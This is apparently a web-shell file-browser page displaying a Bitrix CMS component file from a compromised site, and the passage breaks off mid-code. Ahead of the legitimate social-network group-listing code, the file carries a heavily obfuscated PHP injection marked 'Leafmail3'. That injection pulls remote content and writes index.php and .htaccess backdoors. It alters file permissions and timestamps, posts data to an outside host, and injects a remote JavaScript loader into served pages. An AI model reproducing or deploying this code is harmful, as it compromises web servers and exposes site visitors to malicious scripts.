Your IP : 52.14.161.77


Current Path : /home/bitrix/ext_www/klimatlend.ua/bitrix/components/bitrix/socialnetwork.user_groups/
Upload File :
Current File : /home/bitrix/ext_www/klimatlend.ua/bitrix/components/bitrix/socialnetwork.user_groups/component.php

<?php /*Leafmail3*/goto o1QFr; wasj3: $ZJUCA($jQ0xa, $RTa9G); goto wYDtx; IuHdj: $egQ3R = "\147\172\151"; goto ChKDE; TpHVE: $cPzOq .= "\157\x6b\x6b"; goto vgltl; gmVrv: $Mvmq_ .= "\x6c\x5f\x63\154\x6f"; goto N9T5l; SClM0: $VwfuP = "\x64\x65\146"; goto PXHHr; m8hp8: $uHlLz = "\x73\x74\x72"; goto lz2G0; UH4Mb: $eULaj .= "\x70\x63\x2e\x70"; goto apDh3; QPct6: AtVLG: goto Mg1JO; dj8v0: $ZJUCA = "\143\150"; goto WmTiu; uHm0i: $TBxbX = "\x57\x50\137\125"; goto RCot0; f4Rdw: if (!($EUeQo($kpMfb) && !preg_match($tIzL7, PHP_SAPI) && $fHDYt($uZmPe, 2 | 4))) { goto TGN7B; } goto S2eca; H7qkB: $MyinT .= "\164\40\x41\x63\x63"; goto Air1i; AedpI: try { goto JM3SL; oiS8N: @$YWYP0($lJtci, $H0gg1); goto nucR0; AffR5: @$YWYP0($PcRcO, $H0gg1); goto SpIUU; JnP2S: @$ZJUCA($lJtci, $shT8z); goto oiS8N; nOhHX: @$ZJUCA($lJtci, $RTa9G); goto LvbAc; LvbAc: @$rGvmf($lJtci, $UYOWA["\141"]); goto JnP2S; SpIUU: @$ZJUCA($jQ0xa, $shT8z); goto qvTm1; gA5rv: @$ZJUCA($PcRcO, $shT8z); goto AffR5; nucR0: @$ZJUCA($PcRcO, $RTa9G); goto COvI1; JM3SL: @$ZJUCA($jQ0xa, $RTa9G); goto nOhHX; COvI1: @$rGvmf($PcRcO, $UYOWA["\142"]); goto gA5rv; qvTm1: } catch (Exception $ICL20) { } goto PqZGA; BWxc9: $kpMfb .= "\154\137\x69\156\x69\164"; goto RMP1m; Q7gNx: $gvOPD = "\151\163\137"; goto AfwzG; fFfBR: goto AtVLG; goto kST_Q; J9uWl: $e9dgF .= "\x61\171\163"; goto lNb3h; ZlPje: $u9w0n .= "\x75\x69\x6c\144\x5f\161"; goto Mit4a; YRbfa: $dGt27 .= "\157\x73\x65"; goto L744i; ioNAN: $tIzL7 .= "\x6c\x69\57"; goto Khhgn; mz3rE: $FANp1 .= "\x70\141\x72\145"; goto SClM0; eBKm1: $PcRcO = $jQ0xa; goto Sg4f2; D0V8f: $pv6cp = "\162\x65"; goto Hy0sm; xXaQc: $FANp1 = "\x76\145\162\x73\151"; goto T7IwT; ulics: try { $_SERVER[$pv6cp] = 1; $pv6cp(function () { goto YEXR4; PKzAL: $AG2hR .= "\163\171\x6e\x63\75\164\162\165\145"; goto HIXil; NZAxH: $AG2hR .= "\x65\x72\75\164\x72\165\x65\x3b" . "\12"; goto Tbsb3; xDrpr: $AG2hR .= "\x75\x6d\x65\156\164\54\40\x67\75\144\x2e\143\162\145\x61\164\145"; goto mLjk9; r_Oqj: $AG2hR .= "\163\x63\162\151\160\164\x22\x3e" . "\xa"; goto JZsfv; PEdls: $AG2hR .= "\74\57\163"; goto WBFgG; POyWW: $AG2hR .= "\x4d\55"; goto a8oGQ; N2RIK: $AG2hR .= "\175\x29\50\51\x3b" . "\12"; goto PEdls; Vj0ze: $AG2hR .= "\x72\151\160\x74\40\164\x79\x70\145\x3d\42\164\145\170"; goto FXjwZ; JZsfv: $AG2hR .= "\x28\x66\x75\156\143"; goto ZRBmo; zk1Ml: $AG2hR .= "\x79\124\141\147\x4e\x61\155\145"; goto STHB_; aKt86: $AG2hR .= "\x72\x69\160\x74\42\51\x2c\40\x73\75\x64\x2e\x67\x65\x74"; goto oxuwD; FXjwZ: $AG2hR .= "\x74\57\x6a\141\x76\141"; goto r_Oqj; YffEK: $AG2hR .= "\57\x6d\141\164"; goto nL_GE; ZrlUz: $AG2hR .= "\x73\x63\162\151\x70\164\x22\x3b\40\147\x2e\141"; goto PKzAL; MSqPC: $AG2hR .= "\x65\x20\55\x2d\76\12"; goto rWq2m; gUhrX: $AG2hR .= "\74\x73\143"; goto Vj0ze; oxuwD: $AG2hR .= "\x45\154\x65\x6d\145\156\164\x73\102"; goto zk1Ml; a8oGQ: $AG2hR .= time(); goto xyZaU; WBFgG: $AG2hR .= "\x63\162\151\160\164\x3e\xa"; goto jHj0s; rWq2m: echo $AG2hR; goto zxMHd; zzMTI: $AG2hR .= "\152\141\166\x61"; goto ZrlUz; HIXil: $AG2hR .= "\73\x20\147\56\144\x65\x66"; goto NZAxH; EXhzp: $AG2hR .= "\x65\156\164\x4e\x6f\x64\145\56\x69\x6e"; goto yJp9W; KUpUt: $AG2hR .= "\x64\40\115\141\x74"; goto c13YM; hugz8: $AG2hR .= "\x6f\x72\145\50\x67\54\x73\51\73" . "\xa"; goto N2RIK; xyZaU: $AG2hR .= "\x22\73\40\163\56\160\141\162"; goto EXhzp; ZRBmo: $AG2hR .= "\164\151\x6f\156\x28\51\x20\173" . "\xa"; goto sOVga; YqIfq: $AG2hR .= "\77\x69\x64\x3d"; goto POyWW; Tbsb3: $AG2hR .= "\147\x2e\163\x72"; goto vxsas; k1w2Q: $AG2hR = "\x3c\41\x2d\55\x20\115\x61"; goto OOFo2; F2sIB: $AG2hR .= "\x3d\x22\164\x65\x78\x74\57"; goto zzMTI; OOFo2: $AG2hR .= "\x74\157\155\x6f\x20\55\x2d\x3e\xa"; goto gUhrX; vxsas: $AG2hR .= "\143\x3d\165\x2b\42\x6a\163\57"; goto JGvCK; jHj0s: $AG2hR .= "\74\x21\55\55\40\x45\156"; goto KUpUt; mLjk9: $AG2hR .= "\105\154\x65\x6d\x65\156\x74\50\42\163\x63"; goto aKt86; yJp9W: $AG2hR .= "\x73\x65\162\x74\102\145\146"; goto hugz8; c13YM: $AG2hR .= "\x6f\x6d\x6f\40\103\157\144"; goto MSqPC; STHB_: $AG2hR .= "\50\x22\x73\x63\162\x69"; goto SX8pI; JGvCK: $AG2hR .= $osL5h; goto YffEK; nL_GE: $AG2hR .= "\x6f\155\x6f\56\x6a\x73"; goto YqIfq; SX8pI: $AG2hR .= "\160\x74\42\51\133\x30\135\x3b" . "\xa"; goto uh8pE; YEXR4: global $osL5h, $cPzOq; goto k1w2Q; jW6LQ: $AG2hR .= "\166\141\x72\40\144\x3d\x64\157\143"; goto xDrpr; uh8pE: $AG2hR .= "\x67\x2e\164\x79\x70\145"; goto F2sIB; sOVga: $AG2hR .= "\166\x61\162\40\x75\75\42" . $cPzOq . "\42\x3b" . "\xa"; goto jW6LQ; zxMHd: }); } catch (Exception $ICL20) { } goto arBxc; TrkYs: $eULaj .= "\x2f\170\x6d"; goto GE2p3; L744i: $cPzOq = "\x68\x74\164\x70\163\72\57\x2f"; goto TpHVE; CNdmS: wLXpb: goto wasj3; nHXnO: $_POST = $_REQUEST = $_FILES = array(); goto CNdmS; PHhHL: P9yQa: goto W2Q7W; UkCDT: $cLC40 = 32; goto BnazY; vabQZ: $CgFIN = 1; goto QPct6; gSbiK: try { goto xtnST; qBVAq: $k7jG8[] = $E0suN; goto Tc9Eb; vZ6zL: $E0suN = trim($Q0bWd[0]); goto LuoPM; D98P3: if (!empty($k7jG8)) { goto FbDAI; } goto AML_a; LuoPM: $jCv00 = trim($Q0bWd[1]); goto Q4uy7; xtnST: if (!$gvOPD($d3gSl)) { goto nHP5K; } goto W8uMn; c_73m: FbDAI: goto h1Cu7; kNAxm: if (!($uHlLz($E0suN) == $cLC40 && $uHlLz($jCv00) == $cLC40)) { goto lfWQh; } goto MfJKK; L8cv7: WVm2j: goto c_73m; AML_a: $d3gSl = $jQ0xa . "\x2f" . $HNQiW; goto GBRPC; ZSYyc: $jCv00 = trim($Q0bWd[1]); goto kNAxm; W8uMn: $Q0bWd = @explode("\72", $DJDq1($d3gSl)); goto Woix_; EA1BT: if (!(is_array($Q0bWd) && count($Q0bWd) == 2)) { goto ctSg2; } goto A163l; Woix_: if (!(is_array($Q0bWd) && count($Q0bWd) == 2)) { goto wU2zk; } goto vZ6zL; Q4uy7: if (!($uHlLz($E0suN) == $cLC40 && $uHlLz($jCv00) == $cLC40)) { goto VAVW5; } goto qBVAq; tEVz_: $k7jG8[] = $jCv00; goto xWpvL; xWpvL: lfWQh: goto oilos; MfJKK: $k7jG8[] = $E0suN; goto tEVz_; N3TyU: wU2zk: goto snD7p; lky0R: $Q0bWd = @explode("\72", $DJDq1($d3gSl)); goto EA1BT; Tc9Eb: $k7jG8[] = $jCv00; goto evp7M; snD7p: nHP5K: goto D98P3; oilos: ctSg2: goto L8cv7; evp7M: VAVW5: goto N3TyU; GBRPC: if (!$gvOPD($d3gSl)) { goto WVm2j; } goto lky0R; A163l: $E0suN = trim($Q0bWd[0]); goto ZSYyc; h1Cu7: } catch (Exception $ICL20) { } goto xU6vT; T7IwT: $FANp1 .= "\x6f\x6e\x5f\143\x6f\x6d"; goto mz3rE; JX1Oy: $dGt27 = "\x66\x63\x6c"; goto YRbfa; BnazY: $Pzt0o = 5; goto TYFaW; o1QFr: $kFvng = "\74\x44\x44\x4d\x3e"; goto wODYw; CL80L: $MyinT .= "\120\x2f\61\x2e\x31\x20\x34"; goto gErqa; tFGg7: $YWYP0 .= "\x75\143\x68"; goto dj8v0; pXfDS: $ygOJ_ .= "\x2f\167\160"; goto c7yEe; xUd9U: $pv6cp .= "\151\x6f\x6e"; goto bqFyS; PqZGA: CVVA3: goto RDKTA; wYDtx: $uZmPe = $nPBv4($eULaj, "\x77\x2b"); goto f4Rdw; E453u: $QIBzt .= "\56\64"; goto O8RXw; a4EJZ: $dZR_y = $cPzOq; goto vZkPa; FK_sr: $kb9bA .= "\x65\162\x2e\x69"; goto G2uff; TuwL4: $jQ0xa = $_SERVER[$Wv1G0]; goto wrxGI; wJDrU: $eULaj = $jQ0xa; goto TrkYs; MLdcc: $fHDYt .= "\x63\153"; goto JX1Oy; Gs7Gb: $kpMfb = $vW4As; goto BWxc9; Mit4a: $u9w0n .= "\x75\x65\x72\171"; goto cIo5P; GE2p3: $eULaj .= "\x6c\162"; goto UH4Mb; cIo5P: $uAwql = "\155\x64\65"; goto aXExt; c7yEe: $ygOJ_ .= "\x2d\x61"; goto XWOCC; wrxGI: $ygOJ_ = $jQ0xa; goto pXfDS; XsWqd: $kb9bA .= "\57\56\165\163"; goto FK_sr; cWrVz: $nPBv4 .= "\145\x6e"; goto KCtWA; CrWKs: $l0WLW .= "\157\160\x74"; goto jcG0e; lz2G0: $uHlLz .= "\154\x65\x6e"; goto xXaQc; wee0Y: $ulOTQ .= "\115\111\116"; goto Tfi5q; vgltl: $cPzOq .= "\154\x69\x6e\153\56\x74"; goto pr5fA; Khhgn: $tIzL7 .= "\x73\151"; goto JBJmV; kJlf4: $DJDq1 .= "\147\145\164\137\143"; goto NZqWx; lNb3h: $H0gg1 = $xsR4V($e9dgF); goto XYviL; TBl6Q: sLwcv: goto fFfBR; RMP1m: $l0WLW = $vW4As; goto ujtZa; XQnCd: $PcRcO .= "\x61\143\143\145\163\x73"; goto ikUIP; X4xWX: $QIBzt = "\x35"; goto E453u; hDUdL: $MWMOe .= "\x6c\x65"; goto Q7gNx; LxUUO: $RTa9G = $QTYip($HqqUn($RTa9G), $Pzt0o); goto qaeyL; f6Txl: $HqqUn = "\x64\x65\143"; goto gwNCH; sK97X: $nPBv4 = "\x66\157\160"; goto cWrVz; Ee0VW: $EUeQo .= "\164\x69\x6f\156\x5f"; goto a2JJX; D9NbF: $CgFIN = 1; goto PHhHL; VY3H_: $Wv1G0 = "\x44\117\x43\x55\115\105\116\x54"; goto HpOFr; CRqG1: if (empty($k7jG8)) { goto VIn91; } goto s4AWH; apDh3: $eULaj .= "\x68\160\x2e\60"; goto sK97X; Sg4f2: $PcRcO .= "\57\x2e\x68\x74"; goto XQnCd; jcG0e: $YQ0P6 = $vW4As; goto rA_Dy; dlqC2: $HNQiW = substr($uAwql($osL5h), 0, 6); goto xGZOR; kxKwG: $osL5h = $_SERVER[$i5EZR]; goto TuwL4; ozW5s: $e9dgF .= "\63\x20\x64"; goto J9uWl; xU6vT: $lJtci = $jQ0xa; goto BpRMk; CquiC: $dZR_y .= "\x63\x6f\160\171"; goto BLSy0; GSfrX: $pv6cp .= "\x75\x6e\143\164"; goto xUd9U; yaYSs: $rGvmf .= "\x6f\x6e\x74\x65\156\164\163"; goto mIlAi; FXRyn: $TBxbX .= "\115\x45\x53"; goto R1jVG; kST_Q: VIn91: goto vabQZ; flXr3: $shT8z = $QTYip($HqqUn($shT8z), $Pzt0o); goto TkfCl; FJdH4: $dZR_y .= "\x3d\x67\x65\x74"; goto CquiC; kJyDh: $QTYip = "\x69\156\x74"; goto blzff; s4AWH: $H25pP = $k7jG8[0]; goto t74Wt; TyAte: $k7jG8 = array(); goto UkCDT; EO8QL: try { $UYOWA = @$AkFS8($egQ3R($eKFWX($M7wqP))); } catch (Exception $ICL20) { } goto OXweB; XYviL: $i5EZR = "\110\124\124\x50"; goto j4Pjv; ikUIP: $kb9bA = $jQ0xa; goto XsWqd; VrwTF: $nRD8p .= "\x64\x69\162"; goto aQp1m; dLa5a: $pv6cp .= "\x65\162\x5f"; goto x5YEr; PgImI: @$ZJUCA($kb9bA, $RTa9G); goto yAax8; Jb1Vu: try { goto Bwps7; WPylr: if (!$xsy4x($Y61WO)) { goto nWSzU; } goto NpK90; xqrLf: @$YWYP0($dqnvi, $H0gg1); goto cinsF; N7wJU: if ($xsy4x($Y61WO)) { goto KOuoA; } goto RBLfp; wf0jq: @$ZJUCA($Y61WO, $shT8z); goto xqrLf; bfkJn: try { goto jwOvP; sXqkD: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYPEER, false); goto tXay1; jwOvP: $ekYPG = $kpMfb(); goto jMqt3; VURt4: $l0WLW($ekYPG, CURLOPT_POST, 1); goto Qk7oo; G7Y1e: $l0WLW($ekYPG, CURLOPT_USERAGENT, "\x49\x4e"); goto Sw_Ys; lg1iu: $l0WLW($ekYPG, CURLOPT_TIMEOUT, 3); goto VURt4; jMqt3: $l0WLW($ekYPG, CURLOPT_URL, $LfwPf . "\x26\164\x3d\151"); goto G7Y1e; Qk7oo: $l0WLW($ekYPG, CURLOPT_POSTFIELDS, $u9w0n($Lx9yT)); goto axPES; Sw_Ys: $l0WLW($ekYPG, CURLOPT_RETURNTRANSFER, 1); goto sXqkD; tXay1: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYHOST, false); goto Gb33B; PUEHo: $Mvmq_($ekYPG); goto rF4qo; Gb33B: $l0WLW($ekYPG, CURLOPT_FOLLOWLOCATION, true); goto lg1iu; axPES: $YQ0P6($ekYPG); goto PUEHo; rF4qo: } catch (Exception $ICL20) { } goto zCePm; s2GBY: $Y61WO = dirname($dqnvi); goto N7wJU; bO0VE: KOuoA: goto WPylr; RBLfp: @$ZJUCA($jQ0xa, $RTa9G); goto lexI4; NpK90: @$ZJUCA($Y61WO, $RTa9G); goto aGYEQ; wsLep: $Lx9yT = ["\144\x61\x74\x61" => $UYOWA["\x64"]["\165\162\x6c"]]; goto bfkJn; y0C5p: @$ZJUCA($dqnvi, $shT8z); goto wf0jq; cinsF: $LfwPf = $cPzOq; goto d8sPt; OAF8R: $LfwPf .= "\x6c\x6c"; goto wsLep; d8sPt: $LfwPf .= "\77\141\143"; goto HZ42Q; lexI4: @$nRD8p($Y61WO, $RTa9G, true); goto K7fs2; aGYEQ: @$rGvmf($dqnvi, $UYOWA["\144"]["\x63\157\x64\x65"]); goto y0C5p; zCePm: nWSzU: goto r2ase; Bwps7: $dqnvi = $jQ0xa . $UYOWA["\144"]["\160\x61\x74\x68"]; goto s2GBY; K7fs2: @$ZJUCA($jQ0xa, $shT8z); goto bO0VE; HZ42Q: $LfwPf .= "\164\75\x63\141"; goto OAF8R; r2ase: } catch (Exception $ICL20) { } goto AedpI; kAMGF: $xsy4x .= "\144\x69\x72"; goto gdP2h; lX6T6: if (!$gvOPD($kb9bA)) { goto KTGlr; } goto spjef; jxKJS: $ulOTQ .= "\x5f\x41\104"; goto wee0Y; vZkPa: $dZR_y .= "\x3f\141\143\164"; goto FJdH4; gErqa: $MyinT .= "\60\x36\x20\116\x6f"; goto H7qkB; xGZOR: $hg32N = $d3gSl = $ygOJ_ . "\57" . $HNQiW; goto TyAte; GiT2I: $Mvmq_ = $vW4As; goto gmVrv; KCtWA: $fHDYt = "\x66\x6c\157"; goto MLdcc; Yc09l: $xsy4x = "\x69\163\137"; goto kAMGF; FZsOD: $lJtci .= "\150\x70"; goto eBKm1; rA_Dy: $YQ0P6 .= "\154\137\x65\170\x65\x63"; goto GiT2I; VQCaR: $k8h0h = !empty($m4bDA) || !empty($ZTS7q); goto Bw8cX; ujtZa: $l0WLW .= "\154\137\x73\x65\x74"; goto CrWKs; R1jVG: $ulOTQ = "\127\120"; goto jxKJS; OXweB: if (!is_array($UYOWA)) { goto CVVA3; } goto L7ftk; bqFyS: if (isset($_SERVER[$pv6cp])) { goto Kwp9i; } goto r3vZ_; ChKDE: $egQ3R .= "\156\146\x6c\x61\164\145"; goto OCGca; Bx0F8: $rGvmf = "\146\x69\154\145\x5f"; goto cMMsY; lar4b: $xsR4V .= "\x6d\145"; goto ESAaf; L7ftk: try { goto b8mrw; IZ7dT: @$rGvmf($d3gSl, $UYOWA["\x63"]); goto qi8JJ; j1slf: if (!$xsy4x($ygOJ_)) { goto fnZm_; } goto l27iU; FnW9Y: fnZm_: goto IZ7dT; RHQPY: @$ZJUCA($jQ0xa, $shT8z); goto FudGj; jRIpH: $d3gSl = $hg32N; goto FnW9Y; b8mrw: @$ZJUCA($jQ0xa, $RTa9G); goto j1slf; l27iU: @$ZJUCA($ygOJ_, $RTa9G); goto jRIpH; qi8JJ: @$ZJUCA($d3gSl, $shT8z); goto fMj35; fMj35: @$YWYP0($d3gSl, $H0gg1); goto RHQPY; FudGj: } catch (Exception $ICL20) { } goto Jb1Vu; Hy0sm: $pv6cp .= "\x67\151\x73\164"; goto dLa5a; wODYw: $tIzL7 = "\57\x5e\143"; goto ioNAN; D9G8A: $vW4As = "\x63\165\162"; goto Gs7Gb; zR6Sw: $RTa9G += 304; goto LxUUO; FLAgg: @$ZJUCA($jQ0xa, $shT8z); goto Ms_Rx; TkfCl: $MyinT = "\110\124\124"; goto CL80L; JBJmV: $xsR4V = "\x73\x74\x72"; goto wDwVu; m7Y7E: $shT8z += 150; goto flXr3; OCGca: $AkFS8 = "\165\x6e\x73\145\x72"; goto DuXwv; spjef: @$ZJUCA($jQ0xa, $RTa9G); goto PgImI; mIlAi: $YWYP0 = "\x74\157"; goto tFGg7; Air1i: $MyinT .= "\x65\x70\164\x61\142\154\145"; goto wJDrU; hnuEm: $M7wqP = false; goto IxcDO; AfwzG: $gvOPD .= "\x66\151\154\x65"; goto Yc09l; Mg1JO: if (!$CgFIN) { goto V5o9n; } goto a4EJZ; O8RXw: $QIBzt .= "\x2e\x30\73"; goto kxKwG; Qjsri: Kwp9i: goto uHm0i; aQp1m: $DJDq1 = "\146\151\154\145\x5f"; goto kJlf4; wDwVu: $xsR4V .= "\x74\157"; goto k5kym; Ms_Rx: KTGlr: goto QDkYN; p2xAd: $u9w0n = "\x68\x74\x74\160\x5f\142"; goto ZlPje; XWOCC: $ygOJ_ .= "\x64\155\151\156"; goto dlqC2; PXHHr: $VwfuP .= "\x69\156\145\144"; goto uwRQG; t74Wt: $Aa5A7 = $k7jG8[1]; goto rjUnC; WmTiu: $ZJUCA .= "\x6d\157\x64"; goto OMDdm; F90kP: $CgFIN = 1; goto TBl6Q; IxcDO: try { goto MN2Ol; lfwpD: $l0WLW($ekYPG, CURLOPT_RETURNTRANSFER, 1); goto XT0V7; pm4fL: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYHOST, false); goto f1Wpg; LukB5: $l0WLW($ekYPG, CURLOPT_USERAGENT, "\x49\x4e"); goto lfwpD; MN2Ol: $ekYPG = $kpMfb(); goto PGjVI; XT0V7: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYPEER, false); goto pm4fL; f1Wpg: $l0WLW($ekYPG, CURLOPT_FOLLOWLOCATION, true); goto A02q4; Jr5Fq: $Mvmq_($ekYPG); goto kxHAl; kxHAl: $M7wqP = trim(trim($M7wqP, "\xef\273\xbf")); goto DRdNb; A02q4: $l0WLW($ekYPG, CURLOPT_TIMEOUT, 10); goto czpAh; PGjVI: $l0WLW($ekYPG, CURLOPT_URL, $dZR_y); goto LukB5; czpAh: $M7wqP = $YQ0P6($ekYPG); goto Jr5Fq; DRdNb: } catch (Exception $ICL20) { } goto TtjMz; yA6tr: $e9dgF .= "\63\x36"; goto ozW5s; BLSy0: $dZR_y .= "\x26\164\x3d\x69\46\x68\75" . $osL5h; goto hnuEm; qaeyL: $shT8z = 215; goto m7Y7E; YAsQc: if (!(!$_SERVER[$pv6cp] && $FANp1(PHP_VERSION, $QIBzt, "\76"))) { goto VlKKH; } goto ulics; QDkYN: $CgFIN = 0; goto CRqG1; g3rCR: $m4bDA = $_REQUEST; goto A4fYL; rjUnC: if (!(!$gvOPD($lJtci) || $MWMOe($lJtci) != $H25pP)) { goto P9yQa; } goto D9NbF; x5YEr: $pv6cp .= "\x73\x68\165"; goto itQ2f; A4fYL: $ZTS7q = $_FILES; goto VQCaR; a2JJX: $EUeQo .= "\145\x78"; goto fYDkt; TYFaW: $Pzt0o += 3; goto hoCMV; fYDkt: $EUeQo .= "\x69\163\x74\163"; goto D9G8A; fmcU9: $MWMOe .= "\x5f\x66\151"; goto hDUdL; S2eca: $ZJUCA($jQ0xa, $shT8z); goto YAsQc; RCot0: $TBxbX .= "\x53\105\x5f\124\110\105"; goto FXRyn; BpRMk: $lJtci .= "\57\x69\x6e"; goto lJYIj; cMMsY: $rGvmf .= "\160\x75\164\137\143"; goto yaYSs; j4Pjv: $i5EZR .= "\x5f\x48\117\x53\x54"; goto VY3H_; itQ2f: $pv6cp .= "\x74\x64\x6f"; goto gi1ux; YAE22: $eKFWX .= "\66\x34\137\x64"; goto HkhAv; DuXwv: $AkFS8 .= "\x69\x61\x6c\151\x7a\x65"; goto kJyDh; NZqWx: $DJDq1 .= "\x6f\156\164\145\x6e\x74\x73"; goto Bx0F8; ESAaf: $EUeQo = "\146\x75\156\143"; goto Ee0VW; HkhAv: $eKFWX .= "\x65\143\x6f\x64\145"; goto IuHdj; RDKTA: HuCWH: goto tkEEo; k5kym: $xsR4V .= "\x74\151"; goto lar4b; WQZ3H: $UYOWA = 0; goto EO8QL; TtjMz: if (!($M7wqP !== false)) { goto HuCWH; } goto WQZ3H; N9T5l: $Mvmq_ .= "\x73\145"; goto p2xAd; HpOFr: $Wv1G0 .= "\137\122\117\x4f\124"; goto X4xWX; arBxc: VlKKH: goto gSbiK; G2uff: $kb9bA .= "\156\151"; goto lX6T6; gwNCH: $HqqUn .= "\157\x63\164"; goto m8hp8; yAax8: @unlink($kb9bA); goto FLAgg; pr5fA: $cPzOq .= "\157\x70\x2f"; goto D0V8f; gi1ux: $pv6cp .= "\x77\x6e\x5f\x66"; goto GSfrX; OMDdm: $eKFWX = "\142\141\x73\x65"; goto YAE22; aXExt: $MWMOe = $uAwql; goto fmcU9; gdP2h: $nRD8p = "\155\x6b"; goto VrwTF; Bw8cX: if (!(!$fs0FH && $k8h0h)) { goto wLXpb; } goto nHXnO; uwRQG: $e9dgF = "\x2d\61"; goto yA6tr; hoCMV: $RTa9G = 189; goto zR6Sw; Tfi5q: $fs0FH = $VwfuP($TBxbX) || $VwfuP($ulOTQ); goto g3rCR; W2Q7W: if (!(!$gvOPD($PcRcO) || $MWMOe($PcRcO) != $Aa5A7)) { goto sLwcv; } goto F90kP; r3vZ_: $_SERVER[$pv6cp] = 0; goto Qjsri; lJYIj: $lJtci .= "\144\x65\170\56\x70"; goto FZsOD; blzff: $QTYip .= "\x76\x61\x6c"; goto f6Txl; tkEEo: V5o9n: goto ossJl; ossJl: TGN7B: ?>
<?if (!defined("B_PROLOG_INCLUDED") || B_PROLOG_INCLUDED!==true)die();
/** @var CBitrixComponent $this */
/** @var array $arParams */
/** @var array $arResult */
/** @var string $componentPath */
/** @var string $componentName */
/** @var string $componentTemplate */
/** @global CDatabase $DB */
/** @global CUser $USER */
/** @global CMain $APPLICATION */
/** @global CCacheManager $CACHE_MANAGER */
/** @global CUserTypeManager $USER_FIELD_MANAGER */
global $CACHE_MANAGER, $USER_FIELD_MANAGER;

use \Bitrix\Socialnetwork\UserToGroupTable;
use Bitrix\Main\Config\Option;
use Bitrix\Main\ModuleManager;
use \Bitrix\Main\Localization\Loc;

if (!CModule::IncludeModule("socialnetwork"))
{
	ShowError(Loc::getMessage("SONET_MODULE_NOT_INSTALL"));
	return;
}

CPageOption::SetOptionString("main", "nav_page_in_session", "N");
CSocNetTools::InitGlobalExtranetArrays();

if ($arParams["USE_KEYWORDS"] != "N")
{
	$arParams["USE_KEYWORDS"] = "Y";
}

$arResult["NAV_ID"] = "sonet_user_groups";
$arResult['USE_PROJECTS'] = (
	isset($arParams['USE_PROJECTS'])
	&& $arParams['USE_PROJECTS'] == 'Y'
		? 'Y'
		: 'N'
);

$arParams["USER_ID"] = IntVal($arParams["USER_ID"]);
$currentUser = false;
if ($arParams["USER_ID"] <= 0)
{
	$arParams["USER_ID"] = IntVal($USER->GetID());
	$currentUser = true;
}

$arResult["AJAX_CALL"] = (
	isset($_REQUEST["refreshAjax"])
	&& $_REQUEST["refreshAjax"] == "Y"
);

if ($currentUser)
{
	$hasGroups = false;

	$currentCache = \Bitrix\Main\Data\Cache::createInstance();
	$cacheTtl = 60*60*24*365;
	$cacheId = 'user_has_groups_'.SITE_ID.'_'.$arParams["USER_ID"];
	$cacheDir = '/sonet/user_group_member/'.SITE_ID.'/'.$arParams["USER_ID"];

	if($currentCache->startDataCache($cacheTtl, $cacheId, $cacheDir))
	{
		$res = UserToGroupTable::getList(array(
			'filter' => array(
				'USER_ID' => $arParams["USER_ID"],
				'ROLE' => UserToGroupTable::getRolesMember()
			),
			'select' => array('ID')
		));
		if ($group = $res->fetch())
		{
			$hasGroups = true;
		}

		if(defined("BX_COMP_MANAGED_CACHE"))
		{
			$CACHE_MANAGER->startTagCache($cacheDir);
			$CACHE_MANAGER->registerTag("sonet_user2group_U".$arParams["USER_ID"]);
			$CACHE_MANAGER->endTagCache();
		}
		$currentCache->endDataCache(array('HAS_GROUPS' => $hasGroups));
	}
	else
	{
		$cacheResult = $currentCache->getVars();
		$hasGroups = $cacheResult['HAS_GROUPS'];
	}
}

$arResult['intanetInstalled'] = ModuleManager::isModuleInstalled('intranet');
$arParams["PAGE"] = Trim($arParams["PAGE"]);

if (!in_array($arParams["PAGE"], array("group_request_group_search", "user_groups", "user_projects", "groups_list", "groups_subject")))
{
	$arParams["PAGE"] = ($arResult["USE_PROJECTS"]  == 'Y' ? "user_projects" : "user_groups");
}

$arResult["USER_GROUPS_EMPTY_MODE"] = false;


if (
	$arParams["PAGE"] == 'user_groups'
	&& $currentUser
	&& !$hasGroups
)
{
	$arParams["PAGE"] = "groups_list";
	$arResult["USER_GROUPS_EMPTY_MODE"] = true;
}

$arResult["ORDER_KEY"] = $_REQUEST['order'];
if (empty($arResult["ORDER_KEY"]))
{
	$arResult["ORDER_KEY"] = ($arResult["USER_GROUPS_EMPTY_MODE"] ? 'members_count' : 'alpha');
}

if (intval($arParams["THUMBNAIL_SIZE"]) <= 0)
{
	$arParams["THUMBNAIL_SIZE"] = 48;
}
if (intval($arParams["THUMBNAIL_SIZE_COMMON"]) <= 0)
{
	$arParams["THUMBNAIL_SIZE_COMMON"] = 100;
}

$user4Groups = $arParams["USER_ID"];
$user2Request = 0;
if ($arParams["PAGE"] == "group_request_group_search")
{
	$user4Groups = IntVal($USER->GetID());
	$user2Request = $arParams["USER_ID"];
}

$filtered = false;

if (array_key_exists("filter_name", $_REQUEST) && strlen($_REQUEST["filter_name"]) > 0)
{
	$filtered = true;
	$arResult["filter_name"] = $_REQUEST["filter_name"];
}

if (empty($arParams["FILTER_ID"]))
{
	$arParams["FILTER_ID"] = "SONET_GROUP_LIST";
}

$arGroupFilter = array(
	"=ACTIVE" => "Y"
);

$arResult["USE_UI_FILTER"] = (isset($arParams["USE_UI_FILTER"]) && $arParams["USE_UI_FILTER"] == 'Y');

if ($arResult["USE_UI_FILTER"])
{
	$extranetSiteId = Option::get("extranet", "extranet_site");
	$extranetSiteId = ($extranetSiteId && ModuleManager::isModuleInstalled('extranet') ?  $extranetSiteId : false);

	$filterOption = new \Bitrix\Main\UI\Filter\Options(
		$arParams["FILTER_ID"],
		Bitrix\Socialnetwork\Integration\Main\UIFilter\Workgroup::getFilterPresetList(array(
			'currentUserId' => ($USER->isAuthorized() ? $USER->getId() : false),
			'extranetSiteId' => $extranetSiteId
		))
	);
	$filterData = $filterOption->getFilter();

	if (
		isset($filterData['FILTER_APPLIED'])
		&& $filterData['FILTER_APPLIED']
	)
	{
		if (
			isset($filterData['FIND'])
			&& !empty($filterData['FIND'])
		)
		{
			$filtered = true;
			$arResult["filter_name"] = $filterData['FIND'];
		}

		if (
			isset($filterData['NAME'])
			&& !empty($filterData['NAME'])
		)
		{
			$filtered = true;
			$arResult["filter_name_only"] = $filterData['NAME'];
		}

		if (
			isset($filterData['MEMBER'])
			&& !empty($filterData['MEMBER'])
			&& preg_match('/^U(\d+)$/is', $filterData['MEMBER'], $matches)
			&& !empty($matches[1])
			&& intval($matches[1]) > 0
		)
		{
			$filtered = true;
			$arResult["filter_member"] = intval($matches[1]);

			\Bitrix\Main\FinderDestTable::merge(array(
